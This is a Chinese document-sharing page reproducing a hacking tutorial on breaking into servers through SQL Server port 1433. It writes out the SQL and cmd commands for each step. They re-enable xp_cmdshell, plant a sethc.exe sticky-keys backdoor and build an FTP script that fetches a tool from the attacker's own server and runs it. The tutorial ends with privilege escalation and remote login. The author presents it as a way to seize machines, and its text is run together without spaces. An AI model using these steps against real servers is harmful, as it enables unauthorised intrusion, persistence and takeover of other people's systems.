欢迎来到天天文库
浏览记录
ID:57019410
大小:1.73 MB
页数:13页
时间:2020-07-31
《利用SQL之1433端口巧妙入侵服务器.doc》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、利用SQL之1433端口巧妙入侵服务器 利用1433端口提权相信大家扫到很多1433都提示用netnet1提权都说拒绝访问!且又无法上传!今天给大家针对Net没权限情况的提权方法;1、未找到储存过程!那就来修复下吧!用到SQL语句:xp_cmdshell新的恢复办法第一步先删除:dropproceduresp_addextendedprocdropproceduresp_oacreateexecsp_dropextendedproc'xp_cmdshell'第二步恢复:dbccadd
2、extendedproc("sp_oacreate","odsole70.dll")dbccaddextendedproc("xp_cmdshell","xplog70.dll")直接恢复,不管sp_addextendedproc是不是存在图12、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图23、d:应用软件SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版SP4x86binnxplog70.dLL找到了哈哈!图34、恢复!用到SQL语句:第一ex
3、ecsp_dropextendedproc'xp_cmdshell'第二dbccaddextendedproc("xp_cmdshell","d:应用软件SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版SP4x86binnxplog70.dLL")恢复好了图45、提下权netnet1都拒绝访问!管理降低了权限!图56、于是我想到了后门提权!居然管理也注意到了后门!写了权限!用到CMD命令:五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!cop
4、yC:WINDOWSexplorer.exec:windowssystem32sethc.execopyC:WINDOWSexplorer.exec:windowssystem32dllcachesethc.exe图67、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)用到SQL语句:利用SQL分析器开shift后门(一般只要执行第一步!然后进入后,替换自己的后门)第一:declare@ointexecsp_oacreate'scripting.filesystemobject',@oo
5、utexecsp_oamethod@o,'copyfile',null,'C:WINDOWSexplorer.exe','c:windowssystem32sethc.exe';第二:declare@oointexecsp_oacreate'scripting.filesystemobject',@oooutexecsp_oamethod@oo,'copyfile',null,'c:windowssystem32sethc.exe','c:windowssystem32dllcachesethc.exe';图78、这里
6、是本节的重点了!利用传马的方式提权!首先自己架设一个FTP或是自己已经有FTP的!把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!把FTP传马方式的语句一句一句复制执行DOS命令!用到CMD命令:echoopenFTP>xiuxiu.txt 注意xiuxiu.txt你可以随意改!但是要和下的相同!echo帐号>>xxxx.txtecho密码>>xxxx.txtechobinary>>xxxx.txtechogetnet的名字.exe>>xxxx.txtechobye>>xxxx.txtftp-s:xxxx.txtd
7、elxxxx.txt./q/f图89、好了!执行下最后一条命令!嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图910、好了!最后一条命令执行成功了!返回以下数据!注意:服务器必须能上网!图1011、我XXxX我自己的net好象没加权限吧!居然不能执行返回了以下数据!发生系统错误5...这很多人都遇见过!其实可以省掉一部分!以后提权传net的时候不要传net直接net1因为所以!我也解释不清楚!图1112、嘿嘿net1后成功了!提权成功!图1213、远程登录成功图13
此文档下载收益归作者所有